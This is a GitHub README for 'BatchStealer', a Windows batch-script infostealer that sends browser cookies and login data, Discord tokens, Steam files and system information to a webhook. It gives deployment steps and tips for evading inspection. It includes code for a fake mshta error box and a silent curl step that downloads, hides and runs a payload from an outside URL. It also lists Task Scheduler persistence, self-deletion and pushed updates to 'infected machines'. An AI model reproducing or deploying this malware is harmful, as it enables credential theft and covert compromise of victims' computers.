Skip to content

A batch script for taking information. A bit overdeveloped, and kind of useless.

License

Notifications You must be signed in to change notification settings

Takaovi/BatchStealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 

Repository files navigation

BatchStealer | BatchStealer Example

📜 A batch script for taking things and sending them to a webhook

My attempt at making a stealer with batch, it sucks. The script will not be updated anymore. If something, a new one would be made, this time properly. Treat the current BatchStealer as POC, not as a finished product/malware.

3.4.2021 < FUD (Virustotal)

Made with love in Finland

How to use

⚠️ Windows 10 build 17063, or later (cURL is included)

  1. Change the webhook to yours.
  2. Remove the fail-safes. ("goto xxx")
  3. Run the batch file.

❌ Get rid of the comments 📝

  • Do a regex search on notepad++, match ^::.*\n and replace with nothing.

⛔ Avoid

  • Just changing the webhook and doing nothing else.
    • If the batch file does nothing the user will open it to see what's wrong.

Features

💉 Steals

Almost everything is encrypted, I haven't had the patience to do that on a batch file

Full system information
  • OS Name & Version
  • Product ID
  • System Manufacturer
  • Processor(s)
  • BIOS Version
  • Time Zone
  • Total Physical Memory
  • Network Card(s)
  • And more...
Chrome
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Opera
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Vivaldi
  • Cookies
  • History
  • Shortcuts
  • Bookmarks
  • Login Data
Firefox
  • Logins
  • key3
  • key4
  • Cookies (Plain text!)
osu!
  • osu!.cfg
Discord
  • File containing a Token
  • Other various files
Steam
  • Logged in users (Username, email)
  • Hidden ssfn files
Minecraft
  • Launcher profiles and accounts
Growtopia
  • Save.dat

Other manually addable features

Skip run by Task Scheduler

if not "%~dp0"=="%vpath%\" (
:: Your code not to get recurred
)

Fake error message

set "vpath="
...

:: FAKE ERROR MESSAGE | REMOVE GOTO IF YOU WANT IT TO DISPLAY
:: ----------------------------------------------------------
goto skipfakeerror
if not "%~dp0"=="%vpath%\" (
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""+vbCrLf+vbCrLf+""Anotherbody""),16,""Titletext"":window.close")
)
:skipfakeerror

...

Download & run payload

set "vpath="
set "webhook="

cd %vpath%
...

:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ---------------------------------------------------------------------------------
goto skipcustomdownload
	set "customdownloadurl=https://external.ext/file.exe"
        set "customfilename=c.exe"
	curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
	IF EXIST "%customfilename%" GOTO waitloop4
	curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
	>NUL attrib "%vpath%\%customfilename%" +h
	:waitloop4
	IF EXIST "%customfilename%" GOTO waitloopend4
	timeout /t 5 /nobreak > NUL
	:waitloopend4
	2> NUL start "%customfilename%"
:skipcustomdownload

...

📑 Other features

  • Delete itself after execution

  • Add itself to Task Scheduler (CMD window will be invisible when executed)

    • Will make files to C:\ProgramData by default. (Hidden)
  • Push updates to infected machine(s) (Beta, expect bugs and crashes)

    • Make sure to have a working batch file's source on the link, it will replace everything.
    • Ability to target specific users (Check username)
  • Take screenshot

Included on the Automatic Builder

  • Add garbage code (Confuse/Fill)

  • Obfuscate Not made yet.

Todo

  • DNS poisoning
    • Simple edit of the hosts file (Would require administrator)
  • Other interesting stuff...

💡 Support

  • If you want to support the project do a pull request.
    • The pull request could be a new steal etc.

㊙️ Obfuscation (Read carefully)

  • You can try this
    • Recurring does not work with the obfuscation. (Script exits when it reaches it)
    • "Start as administrator" will make a visible error message on the CMD box.

Thanks

Legal

None of the authors, contributors, or anyone else connected with this open source project, in any way whatsoever, can be responsible for your use of the information or the application contained in or linked from this repository.

Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.

If you don't agree with any of our disclaimers above, do not read the code or download anything from our repository as you have no permission to read and explore our repository until you agree.